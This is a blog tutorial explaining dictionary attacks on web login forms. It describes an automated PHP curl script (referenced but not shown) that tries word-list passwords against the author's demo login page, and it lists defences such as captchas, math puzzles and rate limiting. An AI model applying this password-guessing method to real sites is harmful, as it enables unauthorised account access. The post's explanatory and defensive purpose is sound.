Dictionary attack

This is a tutorial about how to perform a dummy dictionary attack and how web-masters can prevent a dictionary attack.

Wikipedia defines Dictionary attack as,

In cryptanalysis and computer security, a dictionary attack is a technique for defeating a cipher or authentication mechanism by trying to determine its decryption key or passphrase by searching likely possibilities.
A dictionary attack uses a brute-force technique of successively trying all the words in an exhaustive list (from a pre-arranged list of values). In contrast with a normal brute force attack, where a large proportion key space is searched systematically, a dictionary attack tries only those possibilities which are most likely to succeed, typically derived from a list of words in a dictionary. Generally, dictionary attacks succeed because many people have a tendency to choose passwords which are short (7 characters or fewer), single words found in dictionaries or simple, easily-predicted variations on words, such as appending a digit.


In this post, I’m going to write a simple code which will send POST requests to the web server and process the response of each request. Before I start, let me tell you that there are many softwares which already do this. Some of them are,

1. Burp Suite
2. John the Ripper

But what’s the fun in using a software and cracking something. 🙂 The fun part is when YOUR code does something. After all, Code is Poetry (Check wordpress.org footer) 😉

For the demo here, I have this login page, which is very similar to my college mail server (or any horde server). The user-name and password for a successful login is “cs10528” and “remember” respectively. If you provide a valid user-name/password combination, the page will display “Login Successful”. For any other user-name/password combination, the page will display “Login Failed”. So, now all we need is a code which can send POST request to the login page and a dictionary from which we can pick up the probable passwords.

This is the PHP code I’ve written to automate the login process. It reads from the “dict.txt” file and uses that to send the HTTP request. The code is well commented and main login process is done by curl functions. And finally, here is the dict.txt I’ve used for this demo. It has only around 25 words, so that the processing ends sooner. In case you are not comfortable with curl in php, you can see this post, which explains about curl basics.

You can see the whole login process in action here.

So, how can a web-master prevent these automatic logins?

1. Captcha
Adding a captcha prevents almost all the automatic login attempts. But be careful about what kind of captcha you choose. There are quite a few captchas which confuse people and scare them away.

2. Math Puzzles
Instead of images, you can ask the user to enter some simple arithmetic calculations (like what is 10+15). This loads much faster and prevents any confusion.

3. Maintaining the state in server
Store the login access time for each user, and if the time difference is less than 5 seconds, then block the user for next 10 minutes. This needs some more modification in the server side code, with new tables needed to store the login access time data.

Note :
1. The code posted here won’t work for horde. There are cookies and other stuff to be handled in many cases.